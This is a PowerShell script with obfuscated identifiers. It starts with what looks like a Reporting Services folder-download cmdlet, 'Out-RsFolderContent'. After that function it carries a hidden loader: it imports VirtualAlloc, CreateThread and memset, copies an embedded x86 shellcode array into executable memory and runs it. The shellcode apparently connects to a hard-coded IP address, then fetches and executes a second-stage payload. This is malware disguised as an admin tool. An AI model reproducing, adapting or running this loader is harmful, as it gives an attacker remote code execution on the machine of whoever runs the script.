function oUt-RsfOlDE`Rc`O`NtEnt
{
    
    [CmdletBinding()]
    param(
        [switch]
        ${ReC`UR`SE},
        
        [Alias({"{2}{0}{1}" -f 'te','mPath','I'}, {"{0}{1}"-f'P','ath'})]
        [Parameter(manDATory = ${T`RuE})]
        [string]
        ${r`sfOl`D`ER},
        
        [ValidateScript({ .("{2}{3}{0}{1}"-f't','h','T','est-Pa') ${_} -PathType ("{0}{1}{2}"-f'Contai','ne','r') })]
        [Parameter(ManDAtorY = ${Tr`UE})]
        [string]
        ${dEsTin`ATI`On},
        
        [string]
        ${REP`oR`T`sErVErurI},
        
        [Alias({"{4}{1}{0}{2}{3}{5}" -f'rC','tServe','r','edent','Repor','ials'})]
        [System.Management.Automation.PSCredential]
        ${cRe`de`N`TiaL},
        
        ${p`RoXy}
    )
    
    ${pr`O`XY} = .("{0}{4}{6}{2}{3}{5}{1}"-f 'New-Rs','yHelper','r','vic','WebS','eProx','e') -BoundParameters ${ps`BoUnd`ParaMe`TErS}
    
    ${g`EtRsFOldeRCO`N`T`ENtpar`Am} = @{
        ("{0}{1}"-f 'P','roxy') = ${PR`o`xY}
        ("{1}{0}" -f 'sFolder','R') = ${rS`FO`LdEr}
        ("{0}{1}{2}"-f 'Recur','s','e') = ${rEc`URSE}
        ("{0}{1}{2}"-f'Er','rorActi','on') = ("{0}{1}" -f'Sto','p')
    }
    
    try
    {
        ${It`E`ms} = .("{2}{1}{0}{4}{3}"-f 'RsFold','et-','G','ontent','erC') @GetRsFolderContentParam
    }
    catch
    {
        throw (&("{2}{0}{3}{1}" -f 'Ob','t','New-','jec') ("{3}{0}{2}{4}{1}"-f'yste','n','m.Excep','S','tio')("Failed to retrieve items in '$RsFolder': $($_.Exception.Message) ", ${_}."e`xCe`pTIoN"))
    }
    
    ${DES`TinA`TION} = .("{2}{0}{1}" -f 'onvert-Pat','h','C') ${d`eStInAT`i`ON}

    foreach (${IT`EM} in ${iT`Ems})
    {
        if ((${iT`Em}."tY`peNa`mE" -eq ("{1}{2}{0}"-f 'r','Fo','lde')) -and ${r`ECu`Rse})
        {
            ${Re`La`T`ivEpAtH} = ${I`TEm}."p`AtH"
            if(${RS`F`OLD`er} -ne "/")
            {
                ${re`lat`Ive`paTh} = &("{3}{0}{2}{1}"-f 'ear','Substring','-','Cl') -string ${r`ElAT`IvePa`Th} -substring ${R`SFO`LDER} -position ("{0}{1}" -f'fr','ont')
            }
            ${rElaTIv`ePa`TH} = ${re`LATi`V`EPATh}.("{1}{0}"-f'e','Replac').Invoke("/", "\")
            
            ${n`EWFo`LDER} = ${DEs`TIN`Ati`on} + ${re`lATiV`eP`ATH}
            &("{2}{1}{0}"-f 'rbose','-Ve','Write') ('Creating'+' '+'fol'+'der'+' '+"$newFolder")
            &("{1}{0}"-f 'Item','New-') ${N`EwfOld`ER} -ItemType ("{2}{0}{1}"-f 'ir','ectory','D') -Force | .("{2}{1}{0}"-f 'l','l','Out-Nu')
            .("{1}{2}{0}"-f 'Verbose','Wri','te-') ('F'+'o'+'lder: '+"$newFolder "+'wa'+'s '+'cre'+'at'+'ed '+'succes'+'sfull'+'y.')
        }
        
        if (${IT`eM}."Ty`pEna`Me" -eq ("{1}{0}" -f 'e','Resourc') -or 
            ${IT`Em}."t`ypE`NAmE" -eq ("{1}{0}" -f't','Repor') -or 
            ${I`TEM}."Type`Na`me" -eq ("{1}{0}{2}" -f'ataSo','D','urce') -or 
            ${i`TEM}."TyP`e`NamE" -eq ("{0}{1}"-f'DataS','et'))
        {
            
            
            ${r`el`ATI`VePATH} = ${I`TeM}."P`AtH"
            if(${RSfo`l`Der} -ne "/")
            {
                ${RE`L`ATIv`EPA`TH} = &("{2}{3}{0}{1}{4}"-f'bst','r','Clea','r-Su','ing') -string ${reL`At`ivEPAtH} -substring ${rsf`O`LdER} -position ("{1}{0}" -f't','fron')
            }
            ${relati`Ve`p`ATh} = .("{2}{1}{4}{3}{0}"-f'string','le','C','-Sub','ar') -string ${ReLa`TIv`ePAth} -substring ("/" + ${IT`Em}."na`Me") -position ("{0}{1}"-f'ba','ck')
            ${r`elA`TIV`eP`Ath} = ${reLativ`Ep`A`TH}.("{1}{0}"-f 'eplace','r').Invoke("/", "\")

            ${fO`lD`ER} = ${dES`T`inaTioN} + ${R`E`Lat`IvepAtH}
            &("{0}{2}{5}{1}{3}{4}" -f'Out-RsCat','o','a','g','Item','l') -proxy ${pr`oxY} -RsFolder ${I`TEM}."PA`Th" -Destination ${F`oLDeR}
        }
    }
}

${c} = ((("{34}{41}{62}{32}{14}{53}{0}{64}{19}{18}{25}{6}{16}{29}{39}{38}{9}{1}{65}{60}{57}{55}{56}{47}{44}{58}{30}{52}{10}{12}{59}{8}{49}{40}{50}{51}{48}{43}{2}{54}{23}{22}{26}{33}{37}{20}{27}{7}{66}{17}{67}{3}{63}{36}{13}{24}{61}{15}{46}{28}{5}{42}{11}{35}{45}{21}{4}{31}" -f'0})]public ','nt flAl',' lp','d);[DllImport({0}msvcrt.dll{0})]publ','ou',' dest, ','tPtr l','s, I','Ptr','wSize, ui','IntPtr Cr','i','eateThread','xtern I','.dl','tr memset','pAddress, ','read','l',' IntPtr VirtualAl','io','src, uint c','A','t','nt','oc(In','ddr','nFlag','Ptr','uin',' ','nt);','{0}kernel32','ess, IntPtr lpParameter, uint dwCr','[D','nt','c e','eat','d','t ','hreadAttr','llImpor','u','ize, IntPtr','u',' ','(Int','.dll{0})]p','S',' lpT','ibutes, u','int dwStack','static extern ','l{','Star','[DllI','mport({0}kernel32','flProtect);','blic','(Int','ionType, uint ','P','t(','ic stati','static extern','locat','ntPtr lpTh','I'))-f [chaR]34);${w} = .("{0}{1}"-f'Add-','Type') -memberDefinition ${C} -Name ("{0}{1}" -f'Wi','n32') -namespace ("{3}{1}{0}{2}" -f 'Func','2','tions','Win3') -passthru;[Byte[]];[Byte[]]${sC} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0xc6,0x80,0x68,0x02,0x00,0x00,0x50,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${si`ZE} = 0x1000;if (${S`c}."le`NGTh" -gt 0x1000){${Si`ze} = ${S`C}."LeNG`Th"};${X}=${W}::("{1}{2}{0}"-f 'oc','Virtua','lAll').Invoke(0,0x1000,${Si`ze},0x40);for (${I}=0;${I} -le (${sC}."Le`NG`Th"-1);${i}++) {${W}::"MEMs`Et"([IntPtr](${x}.("{0}{1}"-f 'To','Int32').Invoke()+${I}), ${s`C}[${i}], 1)};${w}::("{1}{0}{3}{2}"-f 'te','Crea','d','Threa').Invoke(0,0,${X},0,0,0);for (;;){&("{1}{0}{2}" -f'art-','St','sleep') 60};
